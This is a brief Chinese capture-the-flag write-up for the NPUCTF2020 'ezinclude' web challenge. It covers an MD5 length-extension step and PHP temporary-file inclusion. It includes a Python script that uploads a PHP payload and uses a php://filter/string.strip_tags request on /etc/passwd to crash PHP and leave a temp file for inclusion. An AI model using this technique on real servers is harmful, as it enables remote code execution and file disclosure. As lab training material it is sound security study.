[NPUCTF2020]ezinclude
GET /index.php?name=1&pass=fa25e54758d5d5c1927781a6ede89f8a
MD5哈希长度拓展攻击
把响应包的hash复制到密码那
会弹出
flag.php
这里考察的是PHP临时文件包含,其基本是两种情况:利用能访问的phpinfo页面,对其一次发送大量数据造成临时文件没有及时被删除PHP版本<7.2,利用php崩溃留下临时文件脚本写入
import requests
from io import BytesIO
payload = "<?php phpinfo()?>"
file_data = {
'file': BytesIO(payload.encode())
}
url = "http://ff93a1fd-93c2-4dfb-a8e0-c02b00aa4459.node4.buuoj.cn:81/flflflflag.php?"\
+"file=php://filter/string.strip_tags/resource=/etc/passwd"
r = requests.post(url=url, files=file_data, allow_redirects=False)
访问dir.php
查看临时文件名字